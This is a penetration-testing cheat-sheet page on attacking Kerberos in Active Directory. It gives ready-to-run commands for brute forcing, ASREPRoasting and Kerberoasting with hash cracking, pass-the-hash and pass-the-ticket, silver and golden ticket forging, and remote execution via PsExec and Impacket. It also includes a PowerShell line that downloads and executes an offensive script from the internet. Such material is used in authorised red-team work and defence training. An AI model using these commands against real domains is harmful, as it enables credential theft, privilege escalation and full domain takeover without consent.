Kerberos

Search…
Kerberos
Info
How it works
Step 1
Step 2
Step 3
Step 4
Step 5
Bruteforcing
Requirements: connection with DC/KDC.
Linux (external)
With kerbrute.py:
1
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
Copied!
Windows (internal)
With Rubeus version with brute module:
1
# with a list of users
2
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>
3
​
4
# check passwords for all users in current domain
5
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
Copied!
ASREPRoast
Cracking users password, with KRB_AS_REQ when user has DONT_REQ_PREAUTH attribute, KDC respond with KRB_AS_REP user hash and then go for cracking.
1
# LDAP filter for non preauth krb users
2
LDAP: (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
Copied!
Linux (external)
With Impacket example GetNPUsers.py:
1
# check ASREPRoast for all domain users (credentials required)
2
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
3
​
4
# check ASREPRoast for a list of users (no credentials required)
5
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Copied!
Windows (internal)
With Rubeus:
1
# check ASREPRoast for all users in current domain
2
.\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
3
​
4
# Powerview
5
Get-DomainUser -PreauthNotRequired
6
​
7
# https://github.com/HarmJ0y/ASREPRoast
Copied!
Cracking with dictionary of passwords:
1
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>
2
​
3
john --wordlist=<passwords_file> <AS_REP_responses_file>
Copied!
Kerberoasting
Cracking users password from TGS, because TGS requires Service key which is derived from NTLM hash
1
# LDAP filter for users with linked services
2
LDAP: (&(samAccountType=805306368)(servicePrincipalName=*))
Copied!
Linux (external)
With Impacket example GetUserSPNs.py:
1
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
Copied!
Windows (internal)
With Rubeus:
1
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
Copied!
With Powershell:
1
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
2
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Copied!
Cracking with dictionary of passwords:
1
hashcat -m 13100 --force <TGSs_file> <passwords_file>
2
​
3
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
Copied!
Overpass The Hash/Pass The Key (PTK)
NTDS.DIT, SAM files or lsass with mimi
Linux (external)
By using Impacket examples:
1
# Request the TGT with hash
2
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
3
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
4
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
5
# Request the TGT with password
6
python getTGT.py <domain_name>/<user_name>:[password]
7
# If not provided, password is asked
8
​
9
# Set the TGT for impacket use
10
export KRB5CCNAME=<TGT_ccache_file>
11
​
12
# Execute remote commands with any of the following by using the TGT
13
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
14
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
15
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
Windows (internal)
With Rubeus and PsExec:
1
# Ask and inject the ticket
2
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
3
​
4
# Execute a cmd in the remote machine
5
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!
Pass The Ticket (PTT)
MiTM, lsass with mimi 
Linux (external)
Check type and location of tickets:
1
grep default_ccache_name /etc/krb5.conf
Copied!
If none return, default is FILE:/tmp/krb5cc_%{uid}.
In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being KEYRING tickets, you can use tickey to get them:
1
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
2
# to inject, copy tickey in a reachable folder by all users
3
cp tickey /tmp/tickey
4
/tmp/tickey -i
Copied!
Windows (internal)
With Mimikatz:
1
mimikatz # sekurlsa::tickets /export
Copied!
With Rubeus in Powershell:
1
.\Rubeus dump
2
​
3
# After dump with Rubeus tickets in base64, to write the in a file
4
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
Copied!
To convert tickets between Linux/Windows format with ticket_converter.py:
1
# ccache (Linux), kirbi (Windows from mimi/Rubeus) 
2
python ticket_converter.py ticket.kirbi ticket.ccache
3
python ticket_converter.py ticket.ccache ticket.kirbi
Copied!
Using ticket in Linux
With Impacket examples:
1
# Set the ticket for impacket use
2
export KRB5CCNAME=<TGT_ccache_file_path>
3
​
4
# Execute remote commands with any of the following by using the TGT
5
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
6
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
7
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
Using ticket in Windows
Inject ticket with Mimikatz:
1
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!
Silver ticket
Build a TGS with Service key
Linux (external)
With Impacket examples:
1
# To generate the TGS with NTLM
2
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
3
​
4
# To generate the TGS with AES key
5
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
6
​
7
# Set the ticket for impacket use
8
export KRB5CCNAME=<TGS_ccache_file>
9
​
10
# Execute remote commands with any of the following by using the TGT
11
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
12
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
13
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
Windows (internal)
With Mimikatz:
1
# To generate the TGS with NTLM
2
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
3
​
4
# To generate the TGS with AES 128 key
5
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
6
​
7
# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
8
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
9
​
10
# Inject TGS with Mimikatz
11
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!
Golden ticket
Build a TGT with NTLM hash and krbtgt key, valid until krbtgt password is changed or TGT expires
Tickets must be used right after created
Linux (external)
With Impacket examples:
1
# To generate the TGT with NTLM
2
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
3
​
4
# To generate the TGT with AES key
5
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
6
​
7
# Set the ticket for impacket use
8
export KRB5CCNAME=<TGS_ccache_file>
9
​
10
# Execute remote commands with any of the following by using the TGT
11
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
12
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
13
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Copied!
Windows (internal)
With Mimikatz:
1
# To generate the TGT with NTLM
2
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
3
​
4
# To generate the TGT with AES 128 key
5
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
6
​
7
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
8
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
9
​
10
# Inject TGT with Mimikatz
11
mimikatz # kerberos::ptt <ticket_kirbi_file>
Copied!
Inject ticket with Rubeus:
1
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Copied!
Execute a cmd in the remote machine with PsExec:
1
.\PsExec.exe -accepteula \\<remote_hostname> cmd
Copied!
Misc
To get NTLM from password:
1
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
Copied!
Delegation
Allows a service impersonate the user to interact with a second service, with the privileges and permissions of the user
If a user has delegation capabilities, all its services (and processes) have delegation capabilities.
KDC only worries about the user who is talking to, not the process.
Any process belonging to the same user can perform the same actions in Kerberos, regardless of whether it is a service or not.
Unable to delegate if  NotDelegated (or ADS_UF_NOT_DELEGATED) flag is set in the User-Account-Control attribute of the user account or user in Protected Users group.
Unconstrained delegation
1.User1 requests a TGS for ServiceZ, of UserZ.
2.The KDC checks if UserZ has the TrustedForDelegation flag set (Yes).
3.The KDC includes a TGT of User1 inside the TGS for ServiceZ.
4.ServiceZ receives the TGS with the TGT of User1 included and stores it for later use.
Contrained delegation and RBCD (Resource Based Constrained Delegation)
Delegation is constrained to only some whitelisted third-party services.
S4U2Proxy Contrained
S4U2Proxy RBCD
S4U2Proxy Service Name Change
S4U2Self
S4U2Self & S4U2Proxy combined Contrained
S4U2Self & S4U2Proxy combined RBCD
RBCD attack
GitHub - tothi/rbcd-attack: Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket
GitHub
​
PS tips & tricks
Last modified 1yr ago